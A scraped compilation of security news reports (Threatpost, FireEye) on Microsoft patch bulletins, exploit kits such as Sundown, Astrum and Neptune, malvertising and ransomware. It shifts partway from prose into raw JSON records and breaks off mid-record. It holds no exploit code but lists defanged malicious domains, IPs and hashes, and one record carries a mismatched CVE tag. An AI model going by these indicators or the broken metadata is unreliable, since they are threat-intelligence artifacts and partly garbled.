[MS14-064](<https://technet.microsoft.com/en-us/library/security/MS14-064>) addresses both vulnerabilities in question, [CVE-2014-6332](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>) and [CVE-2014-6352](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6352>). The first CVE occurs when Internet Explorer improperly accesses objects in memory, Microsoft said. The second patch modifies the way Windows validates the use of memory when OLE objects are accessed, Microsoft said.

The use of Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) was also recommended as a temporary stopgap. Microsoft on Monday released [EMET 5.1](<http://support.microsoft.com/kb/3015976#Changes>), and updated a number of the mitigations available, including the resolution of a race condition in the Mandatory ASLR mitigation and the hardening of several other mitigations against reported bypasses.

The most important updates, however, have to do with compatibility with a number of ubiquitous applications, including Internet Explorer, Adobe Reader and Flash, and Mozilla Firefox.

In fact, Microsoft recommends that EMET 5.0 users upgrade to 5.1 immediately, before proceeding with the application of today’s patches.

“If you are using Internet Explorer 11, either on Windows 7 or Windows 8.1, and have deployed EMET 5.0, it is particularly important to install EMET 5.1 as compatibility issues were discovered with the November Internet Explorer security update and the EAF+ mitigation,” Microsoft said in an [advisory](<http://blogs.technet.com/b/srd/archive/2014/11/10/emet-5-1-is-available.aspx>). “Alternatively, you can temporarily disable EAF+ on EMET 5.0.”

As is becoming the norm, Microsoft also released a cumulative update for IE. Today’s bulletin, [MS14-065](<https://technet.microsoft.com/en-us/library/security/MS14-065>), patches 17 vulnerabilities, many of which allow remote code execution. The update is rated critical going back to IE 6.

“The security update addresses the vulnerabilities by modifying the way that Internet Explorer handles objects in memory, by adding additional permission validations to Internet Explorer, and by helping to ensure that affected versions of Internet Explorer properly implement the ASLR security feature,” Microsoft said.

Microsoft also patched a remote code execution vulnerability in Microsoft Secure Channel, or Schannel, a Windows encryption security package used for SSL and TLS connections. [MS14-066](<https://technet.microsoft.com/library/security/MS14-066>) patches an issue in the way Schannel processes specially crafted packets, Microsoft said.

“The fixes in this bulletin are the result of an internal code review at Microsoft that uncovered a number of memory corruption issues in Schannel in both server and client roles,” said Qualys CTO Wolfgang Kandek. “The vulnerabilities are private as they were found by Microsoft internally, and while Microsoft considers it technically challenging to code an exploit, it is only a matter of time and resources; it is prudent to install this bulletin in your next patch cycle.”

[MS14-067](<https://technet.microsoft.com/library/security/MS14-067>) is the final bulletin ranked critical by Microsoft. The vulnerability can be exploited by a malicious website designed to invoke Microsoft XML Core Services through IE, Microsoft said. MSXML improperly parses XML content, which can in turn corrupt the system state and enable remote code execution, Microsoft said.

One bulletin rated important by Microsoft is MS14-069, which patches vulnerabilities in Microsoft Word 2007 that allow for remote code execution. Because it is limited to Office 2007 and cannot be exploited remotely without user action, Microsoft rated it important.

“The attack scenario here is a malicious document that the attacker prepares to exploit the vulnerability. Attackers then send the document directly or a link to their targets and use social engineering techniques, such as legitimate sounding file names and content descriptions that are likely to interest the targets in question,” Kandek said. “If you run newer versions of Microsoft Office you are not vulnerable, but users of Office 2007 should place high priority on this bulletin.”

The remaining bulletins are all rated important by Microsoft:

* [MS14-070](<https://technet.microsoft.com/library/security/MS14-070>) is an elevation of privilege vulnerability in TCP/IP
* [MS14-071](<https://technet.microsoft.com/library/security/MS14-071>) is an elevation of privilege vulnerability in Windows Audio Service
* [MS14-072](<https://technet.microsoft.com/library/security/MS14-072>) is an elevation of privilege vulnerability in the .NET Framework
* [MS14-073](<https://technet.microsoft.com/library/security/MS14-073>) is an elevation of privilege vulnerability in SharePoint Foundation
* [MS14-074](<https://technet.microsoft.com/library/security/MS14-074>) is a security feature bypass in Remote Desktop Protocol
* [MS14-076](<https://technet.microsoft.com/library/security/MS14-076>) is a security feature bypass in Internet Information Services
* [MS14-077](<https://technet.microsoft.com/library/security/MS14-077>) is an information disclosure vulnerability in Active Directory Federation Services
* [MS14-078](<https://technet.microsoft.com/library/security/MS14-078>) is an elevation of privilege vulnerability in IME (Japanese)

**Source:** Threatpost, [November 2014 Microsoft Patch Tuesday Security Bulletins](<https://threatpost.com/microsoft-patches-ole-zero-day-recommends-emet-5-1-before-applying-ie-patches/109302/>), published 2014-11-11 (modified 2014-11-12). Tagged CVEs: CVE-2014-6332, CVE-2014-6352, CVE-2017-11882. CVSS v2: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C).

A ransomware attack that closed off access to personal and
shared drives at University College London last week has been linked to a malvertising campaign spreading Mole, a variant of CryptoMix ransomware.

Kafeine, a white-hat who works for Proofpoint and is known for his research into exploit kits, said in a [report](<https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware>) published today that the group behind AdGholas is responsible. AdGholas are well known malvertising purveyors who have [used steganography in the past to conceal attacks](<https://threatpost.com/adgholas-malvertising-campaign-leveraged-steganography-filtering/119571/>). In this case, the attacks used the Astrum Exploit Kit to spread the malware.

University College London, meanwhile, said today that [all services have been returned to normal](<http://www.ucl.ac.uk/isd/news/isd-news/jun2017/ucl-wide-ransomware-attack-14062017>). As of Friday, personal storage and shared drives had been restored, and yesterday write access to the remaining shared drives was also restored.

The infection, the university said, was contained by last Thursday, and it was continuing to look into the root cause. Initially, officials said the attack started with a phishing email, but later reversed course and said the attack was web-based. Officials also said that services should be able to be restored from backup, sparing them the need to pay a ransom.

A dozen local and shared drives were infected, and the school initially called it a “zero-day attack.”

“Our antivirus software is up to date and we are working with anti-virus suppliers to pass on details of the infection so that they are aware of the incident,” officials said last week. “We cannot currently confirm the ransomware that was deployed.”

Proofpoint said AdGholas’ use of ransomware in this attack is a departure from its normal tactic of spreading banking malware. Kafeine said the attack went beyond just UCL to other high-profile sites.

After ruling out other exploit kits and ransomware based on available forensics, Proofpoint investigated the possibility of the involvement of AdGholas and its use of Astrum to spread malware. One of the IP addresses found in the attack was a Mole command and control server; some malware samples contacting this IP had been submitted to VirusTotal and were consistent with a known Astrum payload.

“At that stage, we were almost convinced the events were tied to AdGholas/Astrum EK activity,” Kafeine wrote. “We confirmed this, however, via an HTTPS connection common to the compromised host avia-book[.]com.”

The compromised domain was used in a number of malvertising campaigns across Europe and Asia, and Kafeine said all the compromised hosts also contacted the current Astrum command and control IP address, which offers full HTTPS support, Proofpoint said.

“Astrum tried HTTPS between March 30 and April 4, 2017, before adopting it permanently at the end of May,” Kafeine said, identifying a number of vulnerabilities exploited by the kit: CVE-2016-0189, CVE-2016-1019, and CVE-2016-4117. “The introduction of Diffie-Hellman suggests that there might be a new exploit the actors are trying to hide in this chain. Obtaining the patch state of the compromised hosts would help rule out this possibility.”

The exploit kit was spreading Mole ransomware on two days, June 14 and 15, in the U.K. and United States, while continuing to spread banking malware elsewhere.

Mole encrypts files and demands 0.5 Bitcoin to receive a decryption key that unlocks scrambled data.

“[AdGholas malvertising](<https://threatpost.com/microsoft-shuts-down-zero-day-used-in-adgholas-malvertising-campaigns/120618/>) redirecting to the Astrum Exploit Kit is the most evolved blind mass infection chain known today,” Kafeine wrote. “Full HTTPS, heavy smart filtering, domain shadowing, Diffie-Hellman, and perfect knowledge of how the advertising industry operates allow these threat actors to lure large agencies to bring them high volumes of traffic from high-value websites and targets.”

**Source:** Threatpost, [UCL Ransomware Linked to AdGholas Malvertising Group](<https://threatpost.com/university-college-london-ransomware-linked-to-adgholas-malvertising-group/126405/>), published 2017-06-20. Tagged CVEs: CVE-2016-0189, CVE-2016-1019, CVE-2016-4117. CVSS v2: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).

Six months of relative quiet around exploit kits recently changed when a public proof-of-concept attack disclosed by a Texas startup was integrated into the Sundown Exploit Kit.

The [proof-of-concept exploit](<https://github.com/theori-io/chakra-2016-11>) was developed by Theori, a research and development firm in Austin, which opened its doors last spring. The PoC targets two vulnerabilities, CVE-2016-7200 and CVE-2016-7201, in Microsoft Edge that were [patched in November](<https://threatpost.com/microsoft-patches-zero-day-disclosed-by-google/121851/>) in [MS16-129](<https://technet.microsoft.com/library/security/MS16-129>) and privately disclosed to Microsoft by Google Project Zero researcher Natalie Silvanovich.

French researcher Kafeine said on Saturday that he had spotted [weaponized versions of the Theori exploits](<http://malware.dontneedcoffee.com/2017/01/CVE-2016-7200-7201.html>) in Sundown two days after they were made public.
The payload is most likely the Zloader DLL injector, but Sundown has also moved other malware in the past, including banking Trojans such as Zeus Panda and Dreambot, and even Bitcoin mining software. Kafeine said this is the first significant exploit kit activity he’s seen in six months.

This is the [second time](<http://malware.dontneedcoffee.com/2016/07/cve-2016-0189-internet-explorer-and.html>) a Theori proof-of-concept exploit has ended up in an exploit kit, Kafeine said, harkening back to CVE-2016-0189, which was patched in May by Microsoft and yet eventually found its way into Neutrino, RIG, Sundown and Magnitude.

Kafeine said he expects other exploit kits to quickly integrate this attack as well, but activity could be slowed by Christmas and New Year holidays in the West, and the recently concluded Russian holiday season.

A request for comment from researchers at Theori was not returned in time for publication. In the Readme for the exploits posted to GitHub, Theori said its PoC was tested on the latest version of Edge running on Windows 10. The vulnerabilities are in the Chakra JavaScript engine, which Microsoft originally developed for Internet Explorer 9. The Theori exploits trigger information leak and type confusion vulnerabilities in the browser, leading to remote code execution.

The bugs were patched Nov. 8 by Microsoft in a cumulative update for the Edge browser; Microsoft characterized them as memory corruption flaws and rated them both critical for Windows clients and moderate for Windows Server. Microsoft described potential attacks in its security bulletin:

“In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through a Microsoft browser and then convince a user to view the website. An attacker could also embed an ActiveX control marked ‘safe for initialization’ in an application or Microsoft Office document that hosts the Edge rendering engine. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.”

Exploit kits are still in the wild, spreading everything from ransomware to click-fraud malware. The integration of new exploits, however, has slowed significantly since the erasure of Angler and other popular kits from the underground. Angler’s disappearance coincided with the June arrests of 50 people in Russia allegedly connected to the [development and distribution of the Lurk Trojan](<https://threatpost.com/inside-the-demise-of-the-angler-exploit-kit/120222/>). Researchers at Kaspersky Lab who [investigated the infrastructure supporting Lurk](<https://securelist.com/analysis/publications/75944/the-hunt-for-lurk/>) said there was little doubt that the criminals behind Lurk were also responsible for Angler’s constant development and profit-making.

Since the end of the summer, however, exploit kit development has all but ended, while attackers have returned to large-scale spamming campaigns and a resurgence of macro malware to move attacks along.

“Regarding the why, I don’t know for sure,” Kafeine said. “Either it’s harder to code those, [or] those who were providing fully working exploits (for Angler for instance) are not anymore into this.

“I think [exploit kits] have not been so far behind in years.”

**Source:** Threatpost, [Two New Edge Exploits Integrated into Sundown Exploit Kit](<https://threatpost.com/two-new-edge-exploits-integrated-into-sundown-exploit-kit/122974/>), published 2017-01-10. Tagged CVEs: CVE-2016-0189, CVE-2016-7200, CVE-2016-7201. CVSS v2: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C).

Microsoft released a hefty load of security bulletins today, which included a patch for a JScript and VBScript scripting engine vulnerability being publicly exploited.

The flaw is addressed in its own bulletin, [MS16-053](<https://technet.microsoft.com/library/security/MS16-053>), but users need to pay attention to, and apply, [MS16-051](<https://technet.microsoft.com/library/security/MS16-051>) as well, since the attack vector is through Internet Explorer.

MS16-051 addresses the issue in IE 9, 10 and 11; MS16-053 patches the flaw in IE 7 and earlier supported versions of the browser.

The flaw, CVE-2016-0189, is one of two memory corruption vulnerabilities in the scripting engines. Both enable arbitrary code execution if a victim, via IE, lands on an attacker’s site hosting the exploit; CVE-2016-0187 is the other flaw in the scripting engines patched today. Microsoft said the flaws exist because of how JScript and VBScript handle objects in memory in IE.
VBScript 5.7 is vulnerable on Windows Vista, Windows Server 2008 and the Server Core installation option, while JScript 5.8 and VBScript 5.8 are vulnerable on Windows Server 2008 R2 for x64 Systems Service Pack 1 are vulnerable on the Server Core installation only.\n\nMicrosoft said that restricting access to VBScript.dll and JScript.dll would be effective and temporary workarounds.\n\nThe IE bulletin, meanwhile, patches three other vulnerabilities, including a bypass of Device Guard. The User Mode Code Integrity component improperly validates code integrity, Microsoft said, allowing an attacker to execute unsigned code that should be blocked.\n\nThere\u2019s also a fix for a separate memory corruption issue in the browser allowing for arbitrary code execution, and an information disclosure flaw caused by the way IE handles file access permissions. An attacker could exploit this flaw too disclose the contents of files stored on the compromised machine.\n\nIn all, Microsoft pushed out 17 bulletins today, eight of those it rated critical, including a bulletin covering vulnerabilities in Flash Player, [MS16-064](<https://technet.microsoft.com/library/security/MS16-064>), patching two dozen remote code execution flaws.\n\nMicrosoft also patched four remote code execution vulnerabilities in its Edge browser in [MS16-052](<https://technet.microsoft.com/library/security/MS16-052>). Three of the flaws are in the Chakra JavaScript engine in the browser, none of which are publicly disclosed nor exploited. The remaining flaw occurs because of how Edge accesses objects in memory, leading to corruption and arbitrary code execution.\n\nAnother bulletin worth watching is [MS16-054](<https://technet.microsoft.com/en-us/library/security/ms16-054.aspx>), which includes patches for four remote code execution flaws in Microsoft Office. 
In addition to Office, Microsoft cautioned that versions of Word going back to Office 2007 are vulnerable to CVE-2016-0198, one of three memory corruption flaws addressed in this bulletin. Users would have to be enticed to open a malicious Word document to exploit this flaw, Microsoft said. The remaining vulnerability is in Office Graphics, specifically in the way the Windows font library handles specially crafted embedded fonts. An attacker could exploit this over the web, or share the file with a user via email or IM, for example.\n\nMicrosoft also patched a critical remote code execution flaw in Windows Journal in [MS16-056](<https://technet.microsoft.com/en-us/library/security/ms16-056.aspx>). An attacker could craft a malicious Journal file and trick the user into opening it in Windows Journal. The flaw affects every supported version of Windows.\n\n[MS16-055](<https://technet.microsoft.com/en-us/library/security/ms16-055.aspx>), meanwhile, patches five flaws in Microsoft Graphics Component, including three remote code execution flaws in Windows Imaging Component, Direct3D and Windows GDI component. 
The bulletin also includes two patches for information disclosure bugs in Windows GDI.\n\nThe final critical bulletin, [MS16-057](<https://technet.microsoft.com/en-us/library/security/ms16-057.aspx>), patches one remote code execution bug in Windows Shell.\n\nThe remaining bulletins were rated important by Microsoft:\n\n * [MS16-058](<https://technet.microsoft.com/en-us/library/security/ms16-058.aspx>) patches one remote code execution vulnerability in Windows IIS; the bug is rated important because an attacker would need local access to exploit the issue.\n * [MS16-059](<https://technet.microsoft.com/en-us/library/security/ms16-059.aspx>) patches a remote code execution flaw in Windows Media Center that could be exploited via a malicious .mcl link.\n * [MS16-060](<https://technet.microsoft.com/en-us/library/security/ms16-060.aspx>) patches a vulnerability in Windows kernel that could be exploited by an attacker with local access installing a crafted, malicious application.\n * [MS16-061](<https://technet.microsoft.com/en-us/library/security/ms16-061.aspx>) patches an elevation of privilege flaw in Windows RPC if an attacker makes a malformed RPC request to the host machine.\n * [MS16-062](<https://technet.microsoft.com/en-us/library/security/ms16-062.aspx>) patches multiple vulnerabilities in Windows Kernel-Mode drivers, including a privilege escalation issue for an attacker with local access.\n * [MS16-065](<https://technet.microsoft.com/en-us/library/security/ms16-065.aspx>) patches an information disclosure flaw in the .NET Framework. 
An attacker would need to inject an attack into the target secure channel and then carry out a man-in-the-middle attack, Microsoft said.\n * [MS16-066](<https://technet.microsoft.com/en-us/library/security/ms16-066.aspx>) patches a Windows Virtual Secure Mode bypass vulnerability.\n * [MS16-067](<https://technet.microsoft.com/en-us/library/security/ms16-067.aspx>) patches a Windows Volume Manager Driver information disclosure flaw that can be exploited if a USB mounted over RDP via RemoteFX is not correctly configured to the user\u2019s session.\n", "cvss3": {}, "published": "2016-05-10T15:03:31", "type": "threatpost", "title": "May 2016 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-0187", "CVE-2016-0189", "CVE-2016-0198"], "modified": "2016-05-11T17:44:09", "id": "THREATPOST:E894CC01A01E2286CFFF1609A00DE5BB", "href": "https://threatpost.com/microsoft-patches-jscript-vbscript-flaw-under-attack/117993/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:09", "description": "A relatively new exploit kit that borrows modules copied from the Metasploit Framework and exploits any older versions of Adobe Flash, Reader and Silverlight the user may be using has begun to make the rounds.\n\nJaime Blasco, the director of AlienVault Labs, dug deeper into the kit, known as Archie, on the [company\u2019s blog yesterday](<http://www.alienvault.com/open-threat-exchange/blog/archie-just-another-exploit-kit>).\n\nFirst discovered by [EmergingThreats in August](<http://emergingthreats.net/daily-ruleset-update-summary-08132014/>), Archie is apparently one of the more basic exploit kits on the market.\n\n\u201cWhen the victim lands on the main page, Archie uses the PluginDetect Javascript library to extract information,\u201d Blasco says, regarding Archie\u2019s functionality.\n\nIn addition to Flash and Reader, the kit also checks victims\u2019 
machines to see if it\u2019s running a 64-bit version of Internet Explorer.\n\nIf caught running an outdated version of Flash, it will load one of two exploits, including CVE-2014-0497, a zero day that hackers used to deploy password-grabbing Trojans in China [back in February](<http://threatpost.com/details-emerge-on-latest-adobe-flash-zero-day-exploit/104068>). Hackers used the other Flash exploit the kit employs, CVE-2014-0515, in attacks against Syrians [in April](<http://threatpost.com/flash-zero-day-used-to-target-victims-in-syria/105726>).\n\nThe IE vulnerability it checks for, [CVE-2013-2551](<http://threatpost.com/microsoft-patches-department-of-labor-pwn2own-ie-vulnerabilities>), is the same use-after-free memory corruption vulnerability that VUPEN dug up at Pwn2Own 2013.\n\nThe Silverlight vulnerability Archie exploits is an old one as well. Despite being patched in March 2013, the kit exploits a vulnerability, [CVE-2013-0074](<threatpost.com/netflixers-beware-angler-exploit-kit-targets-silverlight-vulnerability/102968>), that targets Silverlight 5 and opens systems running it up to remote code execution.\n\n\u201cArchie contains shellcode in different formats that is sent to the different exploit modules generated by Metasploit when it loads them,\u201d Blasco wrote.\n\nThe shellcode then kickstarts a basic download and execute payload, which Blasco said comes from the same IP address as one being used for a .NET click fraud bot.\n\nA bevy of new exploit kits have been circulating in the 10 or so months since authorities in Russia [arrested Paunch](<http://threatpost.com/blackhole-exploit-kit-author-arrested-in-russia/102537>), the Blackhole Exploit Kit\u2019s creator. 
[Blackhole and Cool](<http://threatpost.com/blackhole-and-cool-exploit-kits-nearly-extinct/103034>), another Exploit Kit assumed to have been crafted by Paunch, dissolved soon after.\n\nMalicious ads on Yahoo were found linking European users to one of those kits, Magnitude, in January while this summer, men\u2019s lifestyle site AskMen.com was spotted directing users to the Nuclear Pack Exploit Kit.\n\nArchie joins another exploit kit, Angler, in targeting Silverlight vulnerabilities. Silverlight, Microsoft\u2019s app framework, is perhaps best known for powering media streaming services like Netflix. [Java.com and TMZ.com](<http://threatpost.com/java-com-tmz-serving-malvertising-redirects-to-angler-exploit-kit/107943>) were found sending users to sites peddling Angler last month.\n", "cvss3": {}, "published": "2014-09-16T17:25:57", "type": "threatpost", "title": "Archie Exploit Kit Spotted Leveraging Adobe, Silverlight Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-0074", "CVE-2013-2551", "CVE-2014-0497", "CVE-2014-0515"], "modified": "2014-09-16T21:25:57", "id": "THREATPOST:9928E4032CF09647D7486B6AB9996982", "href": "https://threatpost.com/archie-exploit-kit-targets-adobe-silverlight-vulnerabilities/108317/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:23", "description": "A nasty Adobe Flash zero-day vulnerability that was remediated in an [emergency update in October 2015](<https://threatpost.com/emergency-adobe-flash-zero-day-patch-arrives-ahead-of-schedule/115073/>) was thereafter co-opted by seven exploit kits, according to an analysis published today by researchers at Recorded Future.\n\nThe Adobe vulnerability, CVE-2015-7645, was also used by the Russian APT group known as APT 28, which laced spear phishing emails with exploits targeting foreign affairs ministries worldwide. 
APT 28, also known as Sofacy, frequently targets NATO-allied political targets and in November was [singled out by Microsoft](<https://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/>) for using separate Flash and Windows zero days in targeted attacks this year.\n\nThe Flash bug was among the first to be used after Adobe implemented new mitigations into the software to combat memory-based attacks. Despite the improvements in Flash security, attackers still take a shine to these exploits.\n\nRecorded Future\u2019s report \u201c[New Kit, Same Player](<https://www.recordedfuture.com/top-vulnerabilities-2016/>)\u201d says that six of the top 10 vulnerabilities used in exploit kits were Flash Player bugs, followed by Internet Explorer, Windows and Silverlight exploits. None of this year\u2019s top 10 vulnerabilities were present in a similar analysis done last year.\n\nExploit kits, meanwhile, have been reduced in prominence since the disappearance of a number of popular kits, including Angler and Nuclear. Angler, in particular, was especially popular with criminals; it was updated frequently and sold in a number of underground forums. The June arrest of a Russian cybercrime outfit behind the Lurk Trojan, however, spelled the end of days for Angler. Researchers at Kaspersky Lab [confirmed the connection](<https://securelist.com/analysis/publications/75944/the-hunt-for-lurk/>) between the [Lurk gang and Angler](<https://threatpost.com/inside-the-demise-of-the-angler-exploit-kit/120222/>) distribution in an August report.\n\nNonetheless, exploit kits remain a threat and a vehicle for attacks that include ransomware, click fraud and adware. Victims are compromised in a number of ways, including drive-by attacks, malvertising or links in emails, all of which direct the victim\u2019s browser to the exploit kit\u2019s landing page. 
Code on the page determines the browser being used and launches the exploit most likely to hit paydirt.\n\nCVE-2015-7645 was found in Angler, as well as in Neutrino, Magnitude, RIG, Nuclear Pack, Spartan and Hunter. It, by far, had the highest penetration into exploit kits, according to Recorded Future.\n\nBut since Angler\u2019s demise earlier this year, Sundown has risen to a measure of prominence with its maintainers updating the kit often with new exploits. Sundown\u2019s payload, however, differs in that it drops banking Trojans on users\u2019 machines. Recorded Future said this kit also relies on domain shadowing more than its counterparts in order to register subdomains that are used to host attacks.\n\nSundown also contained CVE-2016-0189, an [Internet Explorer bug](<https://threatpost.com/patched-ie-zero-day-incorporated-into-neutrino-ek/119321/>) used in targeted attacks against South Korean organizations earlier this year. Microsoft patched it in July, but already it had been used by Neutrino as well. The IE bug, Recorded Future said, was the top flaw found in exploit kits, referenced more than 600 times. CVE-2016-1019 and CVE-2016-4117, two other Flash Player bugs, round out the top three. 
[CVE-2016-4117](<https://securelist.com/blog/research/75100/operation-daybreak/>) was used by the [ScarCruft APT group](<https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/>), Kaspersky Lab researchers said in June, in watering hole attacks.\n", "cvss3": {}, "published": "2016-12-06T13:58:56", "type": "threatpost", "title": "Flash Exploit Found in Seven Exploit Kits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-7645", "CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2016-12-07T14:36:02", "id": "THREATPOST:190D2D4CC706E0CF894B62979A2DA309", "href": "https://threatpost.com/flash-exploit-found-in-seven-exploit-kits/122284/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2021-11-04T00:25:01", "description": "Exploit kit (EK) activity has been on the decline ever since [Angler Exploit Kit was shut down](<https://securityintelligence.com/news/say-goodbye-to-the-angler-exploit-kit/>) in 2016. [Fewer people using Internet Explorer](<https://threatpost.com/exploit-kit-activity-quiets-but-is-far-from-silent/124461/>) and a [drop in browser support for Adobe Flash](<https://blog.mozilla.org/futurereleases/2016/07/20/reducing-adobe-flash-usage-in-firefox/>) \u2013 two primary targets of many exploit kits \u2013 have also contributed to this decline. Additionally, some popular redirect campaigns using [PseudoDarkleech and EITest Gate to Rig Exploit Kit](<http://www.darkreading.com/attacks-breaches/rig-exploit-kit-takedown-sheds-light-on-domain-shadowing/d/d-id/1329085>) were shut down in the first half of this year.\n\nDespite all this, [malvertising campaigns involving exploit kits](<https://www.fireeye.com/blog/threat-research/2017/03/still_getting_served.html>) remain active. The Neptune Exploit Kit (or Terror EK), which initially started as a Sundown EK copycat operation, has relied heavily on malvertisements. 
Early use of this exploit kit saw domains with very similar patterns dropping cryptocurrency miners through malvertisements:\n\n * networkmarketingpro3[.]us\n * networkmarketingpro2[.]us\n * onlinesalesproaffiliate1[.]us\n * onlinesalesproaffiliate2[.]us\n * onlinesalesproaffiliate3[.]us\n * onlinesalesproaffiliate4[.]us\n * onlinesalesproaffiliate5[.]us\n * onlinesalesproaffiliate6[.]us\n\nPayloads spread by Neptune Exploit Kit have since diversified. Recently, we have seen changes in Neptune EK\u2019s URI patterns, landing pages, malvertisement campaigns and login account details associated with the cryptocurrency mining payloads. \n\n#### Propagation\n\nSince July 16, our Dynamic Threat Intelligence (DTI) has observed changes in URI patterns for Neptune Exploit Kit. At the time of writing, the new campaign abuses a legitimate popup ad service (within Alexa\u2019s top 100) with redirects to ads about hiking clubs, as shown in Figure 1.\n\n \nFigure 1: Fake ad for a hiking club leading to Neptune EK\n\nRedirects from domains associated with these ads eventually use 302 redirects to move victims to exploit kit landing pages. Fake domains involved in these redirects imitate real domains. For example, highspirittreks[.]club shown in Figure 1 spoofs highspirittreks[.]com. Other hiking fake ads use similarly spoofed legitimate site names with .club domains. Figure 2 shows a redirect from a fake site\u2019s pop-up.\n\n \nFigure 2: Silent redirect to EK landing page\n\nFireEye Dynamic Threat Intelligence (DTI) stats show the regions being affected by this campaign (Figure 3). \n\n \nFigure 3: Regions affected by the malvertisement campaign, as observed from customer data\n\nA few instances of the redirect involve flvto[.]download (mimicking the legitimate www.flvto[.]biz) instead of hiking club fake ads. 
Figure 4 and Figure 5 show the legitimate domain and fake domain, respectively, for comparison\u2019s sake.\n\n \nFigure 4: Real page, flvto[.]biz (Alexa rank 2,674)\n\n \nFigure 5: Fake page, flvto[.]download\n\nMost of the ads linked to this campaign have been observed on high-traffic torrent and multimedia hosting sites.\n\nSites are hosted on IP **95.85.62.226**. Reverse lookup for this IP shows:\n\n * 2watchmygf[.]stream\n * flvto[.]download\n * highspirittreks[.]club\n * treknepal[.]club\n\nOther hosted IPs and domains of the same campaign are in the Indicators of Compromise section at the end of the post. All IPs point to locations in Amsterdam.\n\nSince July 16, related EK infrastructure has been hosted on domains protected by Whois Guard. However, in recent activity, domains are linked to the Registrant email: \u2018gabendollar399@gmx[.]com\u2019. \n\nThe following domains are currently associated with this email:\n\n**Domain Name** | **Create Date** | **Registrar**\n---|---|---\n[itsmebecauseyoua[.]pw](<https://whois.domaintools.com/itsmebecauseyoua.pw>) | 2017-03-05 | --\n[loansforevery[.]us](<https://whois.domaintools.com/loansforevery.us>) | 2017-04-14 | 1 HOST RUSSIA, INC\n[managetheworld[.]us](<https://whois.domaintools.com/managetheworld.us>) | 2017-04-14 | 1 HOST RUSSIA, INC\n[nudecams[.]us](<https://whois.domaintools.com/nudecams.us>) | 2017-04-14 | 1 HOST RUSSIA, INC\n\n#### Exploits/Landing Page\n\nThe landing page for the Neptune Exploit Kit redirects to further HTML and Adobe Flash exploit links after it checks the Flash versions installed on the victim\u2019s machine (see Figure 6).\n\n \nFigure 6: Landing page of Neptune EK\n\nThis EK exploits multiple vulnerabilities in one run. 
Most of these exploits are well-known and commonly seen in other exploit kits.\n\nCurrently, Neptune EK uses three Internet Explorer exploits and two Flash exploits:\n\n * [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) \u2013 Internet Explorer\n * [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) \u2013 Internet Explorer\n * [CVE-2014-6332](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) \u2013 Internet Explorer\n * [CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>) \u2013 Adobe Flash Player\n * [CVE-2015-7645](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7645>) \u2013 Adobe Flash Player\n\n#### Payload (Monero miner)\n\nThe payload is dropped as a plain executable from one of the URIs belonging to the EK domain (same as the landing page). Figure 7 shows a typical response header for these cases.\n\n \nFigure 7: Response header for Monero miner payload\n\nPost-infection traffic shows an attempt to connect to minergate[.]com (Figure 8) and a login attempt using the cpu-miner service via the login email monsterkill20@mail[.]com (Figure 9). Login attempts are invoked via the command line:\n\n\n\n \nFigure 8: DNS query to minergate[.]com\n\n \nFigure 9: Login attempt\n\n#### Conclusion\n\nDespite an observable decline in exploit kit activity, users are still at risk, especially if they have outdated or unpatched software. This threat is especially dangerous considering drive-by exploit kits (such as Neptune EK) can use malvertisements to seamlessly download payloads without ever alerting the user.\n\nFireEye NX [detects exploit kit infection attempts](<https://www.fireeye.com/products/nx-network-security-products.html>) before the malware payload is downloaded to the user\u2019s machine. 
Additionally, malware payloads dropped by exploit kits are detected in all other FireEye products.\n\n#### Indicators of Compromise\n\n##### Malvertisement domains:\n\n * hxxp://treknepal[.]club/\n * hxxp://highspirittrecks[.]club\n * hxxp://advnepaltrekking[.]club\n * hxxp://nepalyogatrek[.]club\n * hxxp://flvto[.]download\n\n##### Malvertisement IPs:\n\n * 95.85.62.226\n * 185.82.202.36\n\n##### EK domains (current active) registrant:\n\n##### Sample EK URI Pattern:\n\nforum_jVpbUAr/showthread.php?id=xxxxxxx\n\n##### Sample MD5s:\n\nb678ac0b870b78060a2a9f599000302d \n5a18c92e148bbd7f10077f8e7431326e\n\n#### Acknowledgement\n\nWe would like to thank Hassan Faizan for his contributions to this discovery.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
